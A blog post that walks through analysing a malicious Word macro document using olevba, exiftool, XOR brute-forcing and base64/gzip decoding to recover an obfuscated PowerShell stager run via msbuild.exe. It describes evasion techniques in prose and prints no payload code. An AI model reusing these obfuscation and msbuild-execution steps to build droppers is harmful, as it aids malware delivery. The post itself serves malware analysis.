MALICIOUS OFFICE DOCUMENT ANALYSIS
In this blog post enrty I analayzed a malicious word document and I use deobfuscation and decoding methods for analysing malicious powershell code. First I used olevba tool in Remnux. When we extract the macro codes of the file, first we recognize a base64 code decoder function. That means adversary probably encode the malicious code with base64.
I keep on analysis with investigating the macro codes. As we have seen from output in hack function, author properties of the file is assigned to author variable, it is important, because in analysis step, we will extract this part of the file. As we see from another line of the macro code as obfuscated and decoded code is written to test.xml we can see the behaviours in dynamic analysis process.
Another piece of the code shows us that xor deobfuscation part of the code and it is called by a different function but I can not find the xor key in the code.
After decoding process new encoded string is assigned to author variable and base64decoding funcion called for decoding the malicious code and it is written to msbuild_stager.xml file.
At the end of the macro code, shell function is called and powershell code which resides in msbuil_stager.xml is executed with msbuild.exe via shell function to conceal powershell.exe process, in the specimen and the .net is used for execution of the powershell code.
When we go on analysis with olevba we see some IOC but we have already detected those IOC’s;
Now it’s time to use exiftool for retriewing the author part of the file;
As we have seen the author part of the file it is obfuscated. It’s not base64 encoding but it might be highly possible xor obfuscated string.
When I display the content of the xobfuscated.txt file we cant see anaything about the malicious code.
I tried to brxor for deobfuscating the string but I can not obtain anything, I tried to bbcrack for deobfuscating the string.
I examine the some deobfuscated strings, some part of the string can be deobfuscated but not for entire of the string. I displayed the the file which has high score. But still it is not ok.
I have created a python code for XOR obfuscation and I have decided to XOR bruteforce for deobfuscating the string.
Then, I create a bash loop for performing bruteforce, so I prepared some files which includes alphabetic chars, numbers, 2 char combinations and numners. I started with alphabetic chars like this;
I have obtained the base64 codes, As we see I can extract the base64 code from the malicious file;
I use base64dump tool for extracting and decoding the encoded string.
When we ecoded the string I saw the gzip compress string which is started H4SI. Now I need to decompress the string.
So I have obtained the powershell code. We can use URL as IOC and we can debug the powershell code by using powershell ISE.
Thank you for reading.
